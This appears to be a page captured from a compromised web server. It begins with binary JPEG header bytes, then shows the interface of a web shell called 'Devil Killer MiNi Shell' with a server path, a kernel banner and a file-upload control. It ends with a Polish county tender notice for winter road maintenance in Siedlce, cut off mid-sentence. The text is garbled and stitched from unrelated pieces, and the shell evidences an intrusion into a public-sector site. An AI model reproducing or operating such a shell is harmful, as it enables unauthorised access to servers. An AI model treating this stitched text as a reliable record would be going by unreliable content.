JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241003/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241003/0052981201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług w zakresie zimowego utrzymania dróg powiatowych na terenie zarządzanym przez Zarząd Powiatu w Siedlcach w sezonie 2024/2025 z podziałem na części </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Siedlecki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 711581653</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Piłsudskiego 40</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Siedlce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">08-110</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL925 - Siedlecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">256447217</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">adziewulska@powiatsiedlecki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.powiatsiedlecki.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług w zakresie zimowego utrzymania dróg powiatowych na terenie zarządzanym przez Zarząd Powiatu w Siedlcach w sezonie 2024/2025 z podziałem na części </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5415db5a-c939-443e-8158-eff0e0c63e95</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00529812</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00022501/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.21 Świadczenie usług w zakresie zimowego utrzymania dróg powiatowych na terenie zarządzanym przez Zarząd Powiatu w Siedlcach w sezonie 2024/2025 z podziałem na części.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://powiatsiedlecki.logintrade.net/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://powiatsiedlecki.logintrade.net/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia komunikacja między zamawiającym a wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej. Oferty, oświadczenia oraz podmiotowe środki dowodowe i inne dokumenty sporządza się, pod rygorem nieważności w formie elektronicznej (tj. opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <br/>2.	Środkiem komunikacji elektronicznej, służącym złożeniu oferty przez Wykonawcę, jest jego prawidłowe złożenie na Platformie dostępnej pod adresem https://powiatsiedlecki.logintrade.net/rejestracja/ustawowe.html w wierszu oznaczonym tytułem oraz znakiem sprawy zgodnym z niniejszym postępowaniem. <br/>3.	Korzystanie z Platformy Przetargowej przez Wykonawcę jest bezpłatne.<br/>4.	Szczegółowe instrukcje dostępne są pod adresem https://powiatsiedlecki.logintrade.net/rejestracja/instrukcje.html<br/>UWAGA! W razie wystąpienia jakichkolwiek problemów prosimy o kontakt z działem Helpdesk Logintrade +48 71 787 35 34, e-mail: helpdesk@logintrade.net.<br/>5.	Specyfikacja połączenia:<br/>Postępowania zakupowe prowadzone są przy użyciu środków komunikacji elektronicznej. Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy Przetargowej: https://powiatsiedlecki.logintrade.net/rejestracja/ustawowe.html<br/>Do połączenia używany jest szyfrowany protokół HTTPS. Szyfrowanie danych odbywa się przy pomocy protokołu SSL. Certyfikat SSL zapewnia poufność transmisji danych przesyłanych przez Internet. Wykonawca posiadający konto na Platformie Przetargowej Zamawiającego ma dostęp do możliwości złożenia, zmiany, wycofania oferty, a także funkcjonalności pozwalających na zadawanie pytań do treści SWZ oraz komunikację z Zamawiającym w pozostałych obszarach. <br/>Wymagania techniczne i organizacyjne dot. korespondencji elektronicznej zawarte są w pkt. VIII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacja zawarta jest w pkt. III. ust. 10 SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacja zawarta jest w pkt. III. ust. 10 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RO.272.64.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">8</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie usług w zakresie zimowego utrzymania dróg powiatowych na terenie zarządzanym przez Zarząd Powiatu w Siedlcach w sezonie 2024/2025 przy pomocy pługopiaskarki w skład której wchodzą: <br/>•	nośnik: samochód ciężarowy o dopuszczalnej masie całkowitej powyżej 20t -Wykonawcy,<br/>•	pług odśnieżny (oz-br32) czołowy dwulemieszowy – Zamawiającego,<br/>•	piaskarka ( P1.D ) – Zamawiającego.<br/><br/>Zimowe utrzymanie polega na:<br/>a) utrzymaniu stanu gotowości osób i środków technicznych zapewniającego przystąpienie do odśnieżania dróg bądź zwalczania śliskości zimowej w miejscu i czasie określonym przez Zamawiającego nie później niż w ciągu 1,0 – 3,0 godziny od powiadomienia przez Zamawiającego (zgodnie ze złożoną ofertą Wykonawcy);<br/>b) utrzymaniu stanu dyspozycyjności polegającego na możliwości natychmiastowego przystąpienia do odśnieżania dróg bądź zwalczania śliskości zimowej, po upływie terminu określonego w pkt. a;<br/>c) odśnieżaniu dróg bądź zwalczaniu śliskości zimowej na drogach powiatowych zarządzanych przez Zarząd Powiatu w Siedlcach wymienionych w załączniku nr 1 do SWZ: plan orientacyjny do odśnieżania i plan orientacyjny do zwalczania śliskości zgodnie ze Standardami Zimowego Utrzymania Dróg Powiatowych Powiatu Siedleckiego.<br/><br/>Materiały do zwalczania śliskości zapewnia Zamawiający. Ich załadunek będzie odbywał się na placu Zamawiającego w Broszkowie, ul. Warszawska 186, 08-130 Kotuń.<br/>Szacunkowy czas pracy sprzętu w ciągu sezonu zimowego 2024/2025 wynosi 100 roboczogodzin. <br/>Ilości te mają charakter orientacyjny i służą do ustalenia wartości złożonych ofert. <br/>Ostateczna wartość zadania będzie wyliczona na podstawie ceny jednostkowej brutto wskazanej przez Wykonawcę w formularzu ofertowym za 1 roboczogodzinę i faktycznie wykonanej usługi oraz kwoty w wysokości 25% stawki za 1 roboczogodzinę za okres utrzymania stanu dyspozycyjności poświadczonej w „Zestawieniu pracy sprzętu” (wg wzoru udostępnionego przez Zamawiającego) przez osobę upoważnioną przez Zamawiającego.<br/>Poprzez czas pracy sprzętu rozumie się czas pracy jednostki sprzętowo-transportowej na drogach powiatowych objętych zamówieniem z posypywaniem mieszanką piaskowo-solną i/lub odśnieżaniem, bez dojazdu do miejsca świadczenia usługi i powrotu do bazy (w przypadku zwalczania śliskości na plac Zamawiającego w Broszkowie). <br/>Zakres do wykonania usługi będzie regulowany przez przedstawiciela Zamawiającego stosownie do potrzeb uzależnionych od warunków atmosferycznych i sytuacji w terenie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z pkt. XIV SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres utrzymania gotowości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie usług przy pomocy samochodu ciężarowego o dopuszczalnej masie całkowitej powyżej 20 t i pługu ciężkiego bocznego.<br/>Świadczenie usług w zakresie zimowego utrzymania dróg powiatowych na terenie zarządzanym przez Zarząd Powiatu w Siedlcach w sezonie 2024/2025 przy pomocy pługopiaskarki w skład której wchodzą: <br/>•	nośnik: samochód ciężarowy o dopuszczalnej masie całkowitej powyżej 20t - Wykonawcy,<br/>•	pług ciężki boczny – Wykonawcy, <br/>•	piaskarka ( P1 J.D ) – Zamawiającego.<br/><br/>Zimowe utrzymanie polega na:<br/>a) utrzymaniu stanu gotowości osób i środków technicznych zapewniającego przystąpienie do odśnieżania dróg bądź zwalczania śliskości zimowej w miejscu i czasie określonym przez Zamawiającego nie później niż w ciągu 1,0 – 3,0 godziny od powiadomienia przez Zamawiającego (zgodnie ze złożoną ofertą Wykonawcy);<br/>b) utrzymaniu stanu dyspozycyjności polegającego na możliwości natychmiastowego przystąpienia do odśnieżania dróg bądź zwalczania śliskości zimowej, po upływie terminu określonego w pkt. a;<br/>c) odśnieżaniu dróg bądź zwalczaniu śliskości zimowej na drogach powiatowych zarządzanych przez Zarząd Powiatu w Siedlcach wymienionych w załączniku nr 1 do SWZ: plan orientacyjny do odśnieżania i plan orientacyjny do zwalczania śliskości zgodnie ze Standardami Zimowego Utrzymania Dróg Powiatowych Powiatu Siedleckiego. <br/><br/>Materiały do zwalczania śliskości zapewnia Zamawiający. Ich załadunek będzie odbywał się na placu Zamawiającego w Broszkowie, ul. Warszawska 186, 08-130 Kotuń.<br/>Szacunkowy czas pracy sprzętu w ciągu sezonu zimowego 2024/2025 wynosi 100 roboczogodzin. <br/>Ilości te mają charakter orientacyjny i służą do ustalenia wartości złożonych ofert. <br/>Ostateczna wartość zadania będzie wyliczona na podstawie ceny jednostkowej brutto wskazanej przez Wykonawcę w formularzu ofertowym za 1 roboczogodzinę i faktycznie wykonanej usługi oraz kwoty w wysokości 25% stawki za 1 roboczogodzinę za okres utrzymania stanu dyspozycyjności poświadczonej w „Zestawieniu pracy sprzętu” (wg wzoru udostępnionego przez Zamawiającego) przez osobę upoważnioną przez Zamawiającego.<br/>Poprzez czas pracy sprzętu rozumie się czas pracy jednostki sprzętowo-transportowej na drogach powiatowych objętych zamówieniem z posypywaniem mieszanką piaskowo-solną i/lub odśnieżaniem, bez dojazdu do miejsca świadczenia usługi i powrotu do bazy <br/>(w przypadku zwalczania śliskości na plac Zamawiającego w Broszkowie). <br/>Zakres do wykonania usługi będzie regulowany przez przedstawiciela Zamawiającego stosownie do potrzeb uzależnionych od warunków atmosferycznych i sytuacji w terenie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z pkt. XIV SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres utrzymania gotowości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie usług w zakresie zimowego utrzymania dróg powiatowych na terenie zarządzanym przez Zarząd Powiatu w Siedlcach w sezonie 2024/2025 przy pomocy dwóch pługopiaskarek Wykonawcy w skład których wchodzą: <br/>•	nośnik: samochód ciężarowy o dopuszczalnej masie całkowitej powyżej 20t, <br/>•	pług ciężki boczny lub czołowy, <br/>•	piaskarka. <br/><br/>Zimowe utrzymanie polega na:<br/>a) utrzymaniu stanu gotowości osób i środków technicznych zapewniającego przystąpienie do odśnieżania dróg bądź zwalczania śliskości zimowej w miejscu i czasie określonym przez Zamawiającego nie później niż w ciągu 1,0 – 3,0 godziny od powiadomienia przez Zamawiającego (zgodnie ze złożoną ofertą Wykonawcy);<br/>b) utrzymaniu stanu dyspozycyjności polegającego na możliwości natychmiastowego przystąpienia do odśnieżania dróg bądź zwalczania śliskości zimowej, po upływie terminu określonego w pkt. a;<br/>c) odśnieżaniu dróg bądź zwalczaniu śliskości zimowej na drogach powiatowych zarządzanych przez Zarząd Powiatu w Siedlcach wymienionych w załączniku nr 1 do SWZ: plan orientacyjny do odśnieżania i plan orientacyjny do zwalczania śliskości zgodnie ze Standardami Zimowego Utrzymania Dróg Powiatowych Powiatu Siedleckiego. <br/><br/>Materiały do zwalczania śliskości zapewnia Zamawiający. Ich załadunek będzie odbywał się na placu Zamawiającego w Broszkowie, ul. Warszawska 186, 08-130 Kotuń.<br/>Szacunkowy czas pracy sprzętu w ciągu sezonu zimowego 2024/2025 wynosi 100 roboczogodzin. <br/>Ilości te mają charakter orientacyjny i służą do ustalenia wartości złożonych ofert. <br/>Ostateczna wartość zadania będzie wyliczona na podstawie ceny jednostkowej brutto wskazanej przez Wykonawcę w formularzu ofertowym za 1 roboczogodzinę i faktycznie wykonanej usługi oraz kwoty w wysokości 25% stawki za 1 roboczogodzinę za okres utrzymania stanu dyspozycyjności poświadczonej w „Zestawieniu pracy sprzętu” (wg wzoru udostępnionego przez Zamawiającego) przez osobę upoważnioną przez Zamawiającego.<br/>Poprzez czas pracy sprzętu rozumie się czas pracy jednostki sprzętowo-transportowej na drogach powiatowych objętych zamówieniem z posypywaniem mieszanką piaskowo-solną i/lub odśnieżaniem, bez dojazdu do miejsca świadczenia usługi i powrotu do bazy (w przypadku zwalczania śliskości na plac Zamawiającego w Broszkowie). <br/>Zakres do wykonania usługi będzie regulowany przez przedstawiciela Zamawiającego stosownie do potrzeb uzależnionych od warunków atmosferycznych i sytuacji w terenie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z pkt. XIV SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres utrzymania gotowości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie usług w zakresie zimowego utrzymania dróg powiatowych na terenie zarządzanym przez Zarząd Powiatu w Siedlcach w sezonie 2024/2025 przy pomocy dwóch równiarek samojezdnych z lemieszem czołowym albo bocznym lub ładowarek o minimalnej masie 10 t z lemieszem czołowym, (rama przegubowa o minimalnym skręcie: lewo/prawo 10o) Wykonawcy.<br/>Zimowe utrzymanie polega w na:<br/>a) utrzymaniu stanu gotowości osób i środków technicznych zapewniającego przystąpienie do odśnieżania dróg w miejscu i czasie określonym przez Zamawiającego nie później niż w ciągu 1,0 – 3,0 godziny od powiadomienia przez Zamawiającego (zgodnie ze złożoną ofertą Wykonawcy);<br/>b) utrzymaniu stanu dyspozycyjności polegającego na możliwości natychmiastowego przystąpienia do odśnieżania dróg po upływie terminu określonego w pkt. a;<br/>c) odśnieżaniu dróg powiatowych zarządzanych przez Zarząd Powiatu w Siedlcach wymienionych w załączniku nr 1 do SWZ: plan orientacyjny do odśnieżania zgodnie ze Standardami Zimowego Utrzymania Dróg Powiatowych Powiatu Siedleckiego. <br/><br/>Szacunkowy czas pracy sprzętu w ciągu sezonu zimowego 2024/2025 wynosi 50 roboczogodzin. <br/>Ilości te mają charakter orientacyjny i służą do ustalenia wartości złożonych ofert. <br/>Ostateczna wartość zadania będzie wyliczona na podstawie ceny jednostkowej brutto wskazanej przez Wykonawcę w formularzu ofertowym za 1 roboczogodzinę i faktycznie wykonanej usługi oraz kwoty w wysokości 25% stawki za 1 roboczogodzinę 